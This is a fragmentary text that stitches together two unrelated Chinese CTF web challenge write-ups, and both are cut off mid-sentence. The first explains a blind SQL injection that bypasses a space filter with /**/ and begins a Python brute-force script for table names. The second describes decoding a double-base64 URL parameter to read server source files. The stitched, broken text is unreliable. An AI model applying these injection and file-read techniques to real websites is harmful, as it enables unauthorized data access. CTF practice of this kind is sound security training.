打开靶机 发现是SQL注入,盲注 过滤了空格符,可以用/**/绕过,抓包 直接上脚本 import requestss=requests.session()url='https://46a0f98e-cdc3-413d-b67c-b2dbaeb5c4ec.chall.ctf.show/index.php'table=""for i in range(1,45): print(i) for j in range(31,128): #爆表名 flag payload = "asc
Web 滴 Web 签到题 Web 大吉大利,今晚吃鸡 1)滴 网址http://117.51.150.246/index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09 参数两次base64解码一次ascii解码得到flag.php 观察只有flag.php才显示图片,尝试把index.php按规则编码获取到index的源码 <?php /* * https://blog.csdn.net/FengBanLiuYun/article/details/80616